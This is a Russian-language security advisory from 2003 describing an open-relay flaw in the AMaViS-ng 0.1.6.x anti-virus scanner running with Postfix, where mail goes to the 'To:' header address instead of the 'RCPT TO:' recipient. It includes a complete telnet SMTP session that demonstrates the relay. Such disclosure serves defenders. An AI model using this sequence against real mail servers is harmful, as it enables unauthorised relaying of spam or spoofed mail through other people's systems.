Отправка неавторизованных почтовых сообщений в AMaViS Anti-Virus Scanner

Дата публикации:
14.04.2003
Всего просмотров:
907
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в AMaViS anti-virus сканере. Удаленный пользователь может эксплуатировать почтовый сервер, использующий AMaViS, чтобы посылать неавторизованные почтовые сообщения.

Как сообщается, удаленный пользователь может посылать неавторизованные почтовые сообщения через postfix почтовый сервер с запущенным AMaViS-ng. Система для отправки сообщений использует "To:" заголовок, вместо "RCPT TO:" команды. Пример:

#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@domainX.tld
(250 ok)
rcpt to:userY@domain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
Уязвимость обнаружена в AMaViS Anti-Virus Scanner 0.1.6.x

Ссылки: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
или введите имя

CAPTCHA